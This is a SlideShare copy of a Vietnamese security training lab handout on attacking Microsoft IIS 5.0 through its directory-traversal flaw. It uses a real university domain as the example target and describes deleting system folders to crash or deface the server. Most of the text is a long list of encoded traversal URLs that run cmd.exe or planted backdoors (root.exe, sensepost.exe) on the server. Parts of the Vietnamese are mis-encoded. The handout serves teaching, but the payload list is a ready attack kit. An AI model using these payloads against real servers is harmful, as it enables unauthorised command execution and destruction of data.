SlideShare a Scribd company logo
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 42
Bài 7:
TẤN CÔNG DỰA TRÊN LỖI IIS5.0
1. Giới thiệu:
Cách tấn công này dựa trên lỗi lập trình của hệ thống chạy web server của
Microsoft Windows IIS 5.0. Lỗi này đã được Microsoft khắc phục trong các phiên
bản về sau.
2. Các bước thực hiện như sau:
Böôùc 1:
Để thực hiện bài lap này cần phải có một server cài đặt hệ điều hành windows server
2000 và IIS 5.0
Ñaàu tieân ta caàn xaùc ñònh ñòa chæ IP cuûa web laø gì? Baèng caùch vaøo start -> run -> cmd :
Giaû söû muoán tìm ñòa chæ web :
www.daihocyduoc.edu.vn ta nhaäp:
C:>ping www.daihocyduoc.edu.vn
hay C:>nslookup www.daihocyduoc.edu.vn
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 43
ta seõ nhaän ñöôïc ñòa chæ IP cuûa website:www.daihocyduoc.edu.vn giaû söû
laø:192.168.1.34
Böôùc 2: Môû IE treân thanh address nhaäp 1 doøng leänh khai thaùc loãi IIS vaøo (raát nhieàu loãi
seõ ñöôïc lieät keâ ôû cuoái baøi vieát)
Sau doù ta coù theå thöïc hieän caùc thao taùc nhö ñang thöïc hieän treân cmd baèng caùch thay ñoåi
caùc leänh ôû cuoái . Ví duï:
…………………………………………………/c+md+test+c: ñeå taïo folder test.
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 44
………………………………………………../c+cd+winnt+c:vaøo folder winnt.
…………………………………………………………………………………………………………………………………………………Vaäy laø ta coù
theå delete caùc folder chính nhö winnt , inetpub………khieán cho web server bò treo vaø
neáu keû taán coâng coù aùc yù thì se deface luoân caû operating system.
Böôùc 3:Ñaây laø 1 soá loãi phoå bieán treân web server söû duïng IIS5.0.
Một số Url'slỗi mẫu:
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:

/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
+c:
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:

/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:

/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
+c:
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 45
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/scripts/root.exe?/c+dir+c:
/scripts/eyehack.exe?/c+dir+c:
/scripts/sensepost.exe?/c+dir+c:
/iisadmpwd/root.exe?/c+dir+c:
/iisadmpwd/eyehack.exe?/c+dir+c:
/iisadmpwd/sensepost.exe?/c+dir+c:
/cgi-bin/root.exe?/c+dir+c:
/cgi-bin/eyehack.exe?/c+dir+c:
/cgi-bin/sensepost.exe?/c+dir+c:
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+d
ir+c:
/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
+c:
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 46
/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+
dir+c:
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:

/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c
+dir+c:
/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d
ir+c:
/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c
+dir+c:
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
+c:
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?
/c+dir+c:
6
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c
+dir+c:
/iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe
?/c+dir+c:
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-
bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c
:
/cgi-
bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
/cgi-
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 47
bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+
c:
/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+d
ir+c:
/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
+c:
/msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+
dir+c:
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:

/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c
+dir+c:
/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d
ir+c:
/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c
+dir+c:
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c
+dir+c:
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 48
/samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+d
ir+c:
/samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c
+dir+c:
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
+c:
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?
/c+dir+c:
/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c
+dir+c:
/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe
?/c+dir+c:
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c
+dir+c:
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c
md.exe?/c+dir+c:
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c
md.exe?/c+dir+c:
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+dir+c:
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.ex
e?/c+dir+c:
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:
/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.e
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 49
x?/c+dir+c:
/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
+c:
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cm
d.exe?/c+dir+c:
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+dir+c:
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c
md.exe?/c+dir+c:
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+dir+c:
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/c
md.exe?/c+dir+c:
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.ex
e?/c+dir+c:
7
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:
/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+di
r+c:
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 50
32/cmd.exe?/c+dir+c:
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../
winnt/system32/cmd.e
xe?/c+dir+c:
/cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+
dir+c:
/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+
dir+c:
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm
d.exe?/c+dir+c:
/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe
?/c+dir+c:
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+d
02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848)3 824 4041 – 090 78 79 477
E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN
Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo an ninh mạng ATHENA 51
ir+c:
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe
?/c+dir+c:
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:

More Related Content

Viewers also liked

Toefl grammar
Toefl grammarToefl grammar
Toefl grammarxeroxk
 
Lab security+baiso3 ethereal
Lab security+baiso3 etherealLab security+baiso3 ethereal
Lab security+baiso3 etherealxeroxk
 
Sử Dụng win 7
Sử Dụng win 7Sử Dụng win 7
Sử Dụng win 7xeroxk
 
Lab seucrity+ Bài 6: Tấn Công Dos Trên Internet
Lab seucrity+ Bài 6: Tấn Công Dos Trên InternetLab seucrity+ Bài 6: Tấn Công Dos Trên Internet
Lab seucrity+ Bài 6: Tấn Công Dos Trên Internetxeroxk
 
Lab security+ Bài 11: SSL
Lab security+ Bài 11: SSLLab security+ Bài 11: SSL
Lab security+ Bài 11: SSLxeroxk
 
Athena Bài Giảng Mạng WLan
Athena Bài Giảng Mạng WLanAthena Bài Giảng Mạng WLan
Athena Bài Giảng Mạng WLanxeroxk
 
Lab seucrity+baiso6 tancongtreninternet
Lab seucrity+baiso6 tancongtreninternetLab seucrity+baiso6 tancongtreninternet
Lab seucrity+baiso6 tancongtreninternetxeroxk
 
Module 4 sharing files by using windows 7
Module 4   sharing files by using windows 7Module 4   sharing files by using windows 7
Module 4 sharing files by using windows 7xeroxk
 
Powerpoint 2010
Powerpoint 2010Powerpoint 2010
Powerpoint 2010xeroxk
 
Trò Chơi Tập Thể
Trò Chơi Tập ThểTrò Chơi Tập Thể
Trò Chơi Tập Thểxeroxk
 
Hướng Dẫn Sử Dụng excel 2010
Hướng Dẫn Sử Dụng excel 2010Hướng Dẫn Sử Dụng excel 2010
Hướng Dẫn Sử Dụng excel 2010xeroxk
 

Viewers also liked (11)

Toefl grammar
Toefl grammarToefl grammar
Toefl grammar
 
Lab security+baiso3 ethereal
Lab security+baiso3 etherealLab security+baiso3 ethereal
Lab security+baiso3 ethereal
 
Sử Dụng win 7
Sử Dụng win 7Sử Dụng win 7
Sử Dụng win 7
 
Lab seucrity+ Bài 6: Tấn Công Dos Trên Internet
Lab seucrity+ Bài 6: Tấn Công Dos Trên InternetLab seucrity+ Bài 6: Tấn Công Dos Trên Internet
Lab seucrity+ Bài 6: Tấn Công Dos Trên Internet
 
Lab security+ Bài 11: SSL
Lab security+ Bài 11: SSLLab security+ Bài 11: SSL
Lab security+ Bài 11: SSL
 
Athena Bài Giảng Mạng WLan
Athena Bài Giảng Mạng WLanAthena Bài Giảng Mạng WLan
Athena Bài Giảng Mạng WLan
 
Lab seucrity+baiso6 tancongtreninternet
Lab seucrity+baiso6 tancongtreninternetLab seucrity+baiso6 tancongtreninternet
Lab seucrity+baiso6 tancongtreninternet
 
Module 4 sharing files by using windows 7
Module 4   sharing files by using windows 7Module 4   sharing files by using windows 7
Module 4 sharing files by using windows 7
 
Powerpoint 2010
Powerpoint 2010Powerpoint 2010
Powerpoint 2010
 
Trò Chơi Tập Thể
Trò Chơi Tập ThểTrò Chơi Tập Thể
Trò Chơi Tập Thể
 
Hướng Dẫn Sử Dụng excel 2010
Hướng Dẫn Sử Dụng excel 2010Hướng Dẫn Sử Dụng excel 2010
Hướng Dẫn Sử Dụng excel 2010
 

Similar to Lab security+baiso7 tancong iis5

Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paper
Zairul Nizam
 
บทที่2 ความก้าวหน้าทางเทคโนโลยีสารสนเทศ
บทที่2 ความก้าวหน้าทางเทคโนโลยีสารสนเทศบทที่2 ความก้าวหน้าทางเทคโนโลยีสารสนเทศ
บทที่2 ความก้าวหน้าทางเทคโนโลยีสารสนเทศBeauso English
 
A01 assignment-1
A01 assignment-1A01 assignment-1
A01 assignment-1
Sandeep Ratnam
 
Cisco CCNA Security 210-260 Practice Exam
Cisco CCNA Security 210-260 Practice ExamCisco CCNA Security 210-260 Practice Exam
Cisco CCNA Security 210-260 Practice Exam
Jysmeen
 
COIT20262 Assignment 2 Questions Term 2, 2018 Advanced Net.docx
COIT20262 Assignment 2 Questions Term 2, 2018 Advanced Net.docxCOIT20262 Assignment 2 Questions Term 2, 2018 Advanced Net.docx
COIT20262 Assignment 2 Questions Term 2, 2018 Advanced Net.docx
mary772
 
Activity 5
Activity 5Activity 5
Activity 5
Heidi Owens
 
M11Cde Skills-Based Assessment
M11Cde Skills-Based AssessmentM11Cde Skills-Based Assessment
M11Cde Skills-Based Assessment
Megan Jones
 
Medhat cv system_admin
Medhat cv system_adminMedhat cv system_admin
Medhat cv system_admin
Medhat abdel monaem
 
MSMDC_CLI363
MSMDC_CLI363MSMDC_CLI363
MSMDC_CLI363
mokacao
 
Ccnp sisas 300 208
Ccnp sisas 300 208Ccnp sisas 300 208
Ccnp sisas 300 208
p4sco
 
ops300 Project(3)
ops300 Project(3)ops300 Project(3)
ops300 Project(3)
trayyoo
 
ops300 Project(4)
ops300 Project(4)ops300 Project(4)
ops300 Project(4)
trayyoo
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
Peter Sabev
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
Rob Fuller
 
Microsoft .Net Framework 2 0
Microsoft .Net Framework 2 0Microsoft .Net Framework 2 0
Microsoft .Net Framework 2 0
Acend Corporate Learning
 
Bangladesh Bank Assistant Maintenance Engineer Question Solution.
Bangladesh Bank Assistant Maintenance Engineer Question Solution.Bangladesh Bank Assistant Maintenance Engineer Question Solution.
Bangladesh Bank Assistant Maintenance Engineer Question Solution.
Engr. Md. Jamal Uddin Rayhan
 
Automating Desktop Management with Windows Powershell V2.0 and Group Policy M...
Automating Desktop Management with Windows Powershell V2.0 and Group Policy M...Automating Desktop Management with Windows Powershell V2.0 and Group Policy M...
Automating Desktop Management with Windows Powershell V2.0 and Group Policy M...
Microsoft TechNet
 
CSS L01 - Introduction to Computer System Servicing (NCII)
CSS L01 - Introduction to Computer System Servicing (NCII)CSS L01 - Introduction to Computer System Servicing (NCII)
CSS L01 - Introduction to Computer System Servicing (NCII)
Marvin Bronoso
 
CBSE XI COMPUTER SCIENCE
CBSE XI COMPUTER SCIENCECBSE XI COMPUTER SCIENCE
CBSE XI COMPUTER SCIENCE
Gautham Rajesh
 

Similar to Lab security+baiso7 tancong iis5 (20)

Web Server and Web Technology Exam paper
Web Server and Web Technology Exam paperWeb Server and Web Technology Exam paper
Web Server and Web Technology Exam paper
 
บทที่2 ความก้าวหน้าทางเทคโนโลยีสารสนเทศ
บทที่2 ความก้าวหน้าทางเทคโนโลยีสารสนเทศบทที่2 ความก้าวหน้าทางเทคโนโลยีสารสนเทศ
บทที่2 ความก้าวหน้าทางเทคโนโลยีสารสนเทศ
 
A01 assignment-1
A01 assignment-1A01 assignment-1
A01 assignment-1
 
Cisco CCNA Security 210-260 Practice Exam
Cisco CCNA Security 210-260 Practice ExamCisco CCNA Security 210-260 Practice Exam
Cisco CCNA Security 210-260 Practice Exam
 
COIT20262 Assignment 2 Questions Term 2, 2018 Advanced Net.docx
COIT20262 Assignment 2 Questions Term 2, 2018 Advanced Net.docxCOIT20262 Assignment 2 Questions Term 2, 2018 Advanced Net.docx
COIT20262 Assignment 2 Questions Term 2, 2018 Advanced Net.docx
 
Activity 5
Activity 5Activity 5
Activity 5
 
M11Cde Skills-Based Assessment
M11Cde Skills-Based AssessmentM11Cde Skills-Based Assessment
M11Cde Skills-Based Assessment
 
Sql full tutorial
Sql full tutorialSql full tutorial
Sql full tutorial
 
Medhat cv system_admin
Medhat cv system_adminMedhat cv system_admin
Medhat cv system_admin
 
MSMDC_CLI363
MSMDC_CLI363MSMDC_CLI363
MSMDC_CLI363
 
Ccnp sisas 300 208
Ccnp sisas 300 208Ccnp sisas 300 208
Ccnp sisas 300 208
 
ops300 Project(3)
ops300 Project(3)ops300 Project(3)
ops300 Project(3)
 
ops300 Project(4)
ops300 Project(4)ops300 Project(4)
ops300 Project(4)
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
 
Microsoft .Net Framework 2 0
Microsoft .Net Framework 2 0Microsoft .Net Framework 2 0
Microsoft .Net Framework 2 0
 
Bangladesh Bank Assistant Maintenance Engineer Question Solution.
Bangladesh Bank Assistant Maintenance Engineer Question Solution.Bangladesh Bank Assistant Maintenance Engineer Question Solution.
Bangladesh Bank Assistant Maintenance Engineer Question Solution.
 
Automating Desktop Management with Windows Powershell V2.0 and Group Policy M...
Automating Desktop Management with Windows Powershell V2.0 and Group Policy M...Automating Desktop Management with Windows Powershell V2.0 and Group Policy M...
Automating Desktop Management with Windows Powershell V2.0 and Group Policy M...
 
CSS L01 - Introduction to Computer System Servicing (NCII)
CSS L01 - Introduction to Computer System Servicing (NCII)CSS L01 - Introduction to Computer System Servicing (NCII)
CSS L01 - Introduction to Computer System Servicing (NCII)
 
CBSE XI COMPUTER SCIENCE
CBSE XI COMPUTER SCIENCECBSE XI COMPUTER SCIENCE
CBSE XI COMPUTER SCIENCE
 

More from xeroxk

Báo cáo NetCitizens Việt Nam- Tình hình sử dụng và tốc độ phát triển...
Báo cáo NetCitizens Việt Nam- Tình hình sử dụng và tốc độ phát triển...Báo cáo NetCitizens Việt Nam- Tình hình sử dụng và tốc độ phát triển...
Báo cáo NetCitizens Việt Nam- Tình hình sử dụng và tốc độ phát triển...
xeroxk
 
Hiệu ứng Nước trên Photoshop
Hiệu ứng Nước trên PhotoshopHiệu ứng Nước trên Photoshop
Hiệu ứng Nước trên Photoshopxeroxk
 
Một Số Thuật Ngữ Kinh Tế
Một Số Thuật Ngữ Kinh TếMột Số Thuật Ngữ Kinh Tế
Một Số Thuật Ngữ Kinh Tếxeroxk
 
Xây Dựng Thương Hiệu
Xây Dựng Thương HiệuXây Dựng Thương Hiệu
Xây Dựng Thương Hiệuxeroxk
 
Lab linux phần iv- Internet Services
Lab linux phần iv- Internet ServicesLab linux phần iv- Internet Services
Lab linux phần iv- Internet Servicesxeroxk
 
Lab linux phan iii
Lab linux phan iiiLab linux phan iii
Lab linux phan iiixeroxk
 
Lab linux phan i, ii.doc
Lab linux phan i, ii.docLab linux phan i, ii.doc
Lab linux phan i, ii.docxeroxk
 
huong dan PHP-2
huong dan PHP-2huong dan PHP-2
huong dan PHP-2xeroxk
 
Hướng Dẫn Php
Hướng Dẫn  PhpHướng Dẫn  Php
Hướng Dẫn Phpxeroxk
 
Module 10 configuring windows 7 media applications
Module 10   configuring windows 7 media applicationsModule 10   configuring windows 7 media applications
Module 10 configuring windows 7 media applicationsxeroxk
 
Module 12 wireless
Module 12   wirelessModule 12   wireless
Module 12 wirelessxeroxk
 
Module 6 configuring user account security
Module 6   configuring user account securityModule 6   configuring user account security
Module 6 configuring user account securityxeroxk
 
Module 3 configuring post-installation system settings
Module 3   configuring post-installation system settingsModule 3   configuring post-installation system settings
Module 3 configuring post-installation system settingsxeroxk
 
Module 7 configuring network security
Module 7   configuring network securityModule 7   configuring network security
Module 7 configuring network securityxeroxk
 
Lab security+ Bài 8: Netcat
Lab security+ Bài 8: NetcatLab security+ Bài 8: Netcat
Lab security+ Bài 8: Netcatxeroxk
 
Lab security+ Bài 1:Scanning
Lab security+ Bài 1:ScanningLab security+ Bài 1:Scanning
Lab security+ Bài 1:Scanningxeroxk
 

More from xeroxk (17)

Báo cáo NetCitizens Việt Nam- Tình hình sử dụng và tốc độ phát triển...
Báo cáo NetCitizens Việt Nam- Tình hình sử dụng và tốc độ phát triển...Báo cáo NetCitizens Việt Nam- Tình hình sử dụng và tốc độ phát triển...
Báo cáo NetCitizens Việt Nam- Tình hình sử dụng và tốc độ phát triển...
 
Hiệu ứng Nước trên Photoshop
Hiệu ứng Nước trên PhotoshopHiệu ứng Nước trên Photoshop
Hiệu ứng Nước trên Photoshop
 
Một Số Thuật Ngữ Kinh Tế
Một Số Thuật Ngữ Kinh TếMột Số Thuật Ngữ Kinh Tế
Một Số Thuật Ngữ Kinh Tế
 
Xây Dựng Thương Hiệu
Xây Dựng Thương HiệuXây Dựng Thương Hiệu
Xây Dựng Thương Hiệu
 
Xml
XmlXml
Xml
 
Lab linux phần iv- Internet Services
Lab linux phần iv- Internet ServicesLab linux phần iv- Internet Services
Lab linux phần iv- Internet Services
 
Lab linux phan iii
Lab linux phan iiiLab linux phan iii
Lab linux phan iii
 
Lab linux phan i, ii.doc
Lab linux phan i, ii.docLab linux phan i, ii.doc
Lab linux phan i, ii.doc
 
huong dan PHP-2
huong dan PHP-2huong dan PHP-2
huong dan PHP-2
 
Hướng Dẫn Php
Hướng Dẫn  PhpHướng Dẫn  Php
Hướng Dẫn Php
 
Module 10 configuring windows 7 media applications
Module 10   configuring windows 7 media applicationsModule 10   configuring windows 7 media applications
Module 10 configuring windows 7 media applications
 
Module 12 wireless
Module 12   wirelessModule 12   wireless
Module 12 wireless
 
Module 6 configuring user account security
Module 6   configuring user account securityModule 6   configuring user account security
Module 6 configuring user account security
 
Module 3 configuring post-installation system settings
Module 3   configuring post-installation system settingsModule 3   configuring post-installation system settings
Module 3 configuring post-installation system settings
 
Module 7 configuring network security
Module 7   configuring network securityModule 7   configuring network security
Module 7 configuring network security
 
Lab security+ Bài 8: Netcat
Lab security+ Bài 8: NetcatLab security+ Bài 8: Netcat
Lab security+ Bài 8: Netcat
 
Lab security+ Bài 1:Scanning
Lab security+ Bài 1:ScanningLab security+ Bài 1:Scanning
Lab security+ Bài 1:Scanning
 

Recently uploaded

SOCIOLOGY PPT. SOCIAL SECURITY POWER POINT
SOCIOLOGY PPT. SOCIAL SECURITY POWER POINTSOCIOLOGY PPT. SOCIAL SECURITY POWER POINT
SOCIOLOGY PPT. SOCIAL SECURITY POWER POINT
ssuser8d5e2d1
 
UNIVERSAL HUMAN VALUES- Harmony in the Nature
UNIVERSAL HUMAN VALUES- Harmony in the NatureUNIVERSAL HUMAN VALUES- Harmony in the Nature
UNIVERSAL HUMAN VALUES- Harmony in the Nature
Chandrakant Divate
 
Collocation thường gặp trong đề thi THPT Quốc gia.pdf
Collocation thường gặp trong đề thi THPT Quốc gia.pdfCollocation thường gặp trong đề thi THPT Quốc gia.pdf
